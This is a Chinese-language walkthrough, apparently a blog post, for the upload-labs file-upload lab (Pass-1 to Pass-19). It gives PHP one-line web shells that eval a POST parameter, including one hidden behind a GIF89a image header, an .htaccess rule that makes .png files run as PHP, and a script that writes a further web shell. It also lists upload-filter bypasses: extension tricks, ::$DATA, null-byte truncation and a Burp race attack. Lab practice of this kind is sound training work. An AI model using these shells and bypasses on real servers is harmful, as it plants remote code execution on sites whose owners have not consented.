创建一个文本文档1.php或者什么都行内容如下:
<?php @eval($_POST[cmd]);?>
Pass-1.
上传文件打开任务管理器扎熬到这个位置删掉然后上传即可
Pass-2.
上传一个1.php文件,用burp抓包
用burp抓包然后修改文件的类型
然后放行即可(得不到多点几遍放行)
Pass-3.
把文件名改为1.php3就可以上传成功
Pass-4.
这一关需要先上传一个后缀为.htaccess的文件内容为:
AddType application/x-httpd-php .png
然后吧1.php修改为1.png第二个文件上传就可以了
Pass-5.
把1.php修改为1.Php就可以了
Pass-6.
用burp抓包然后在图中光标位置加个空格
放行就可以得到了
Pass-7.
和第六关一样,一样使用burp抓包然后后缀加一个点
然后放行可以了
Pass-8.在burp中抓包在文件名后加 ::$DATA
就可以上传成功了
Pass-9.
上传文件并在burp中抓包修改光标位置加个点空格点
就上传成功了
Pass-10.
修改文件1.php为1.pphphp
Pass-11.
get 00截断绕过
修改1.php文件为1.php内容为:
然后用bp抓包后在如下光标位置修改为/var/www/html/upload/12.php%00
然后放行就可以了
Pass-12.post 00截断绕过 与11关大同小异
Pass-13.
修改1.php为1.jpg内容为:
GIF89a
<?php @eval($_POST[cmd]);?>
然后上传就可以了
Pass-14.和第13关一样做法
Pass-15.和第13关一样做法
Pass-16.
首先有一个二次渲染的gif文件
然后上传就可以了
Pass-17.
抓包放到intruder里
清除payfoad位置
点左上角payload修改如图
然后开始攻击后进入自己本机地址跟后缀入图下出不来一直按f5刷新就会出现
Pass-18.
和第16关一样上传那个22.gif就可以了
Pass-19.
上传一个1.php内容如图所示:
<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
保存名称看清楚是.php.不是.php
然后你就得到一个6.php
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
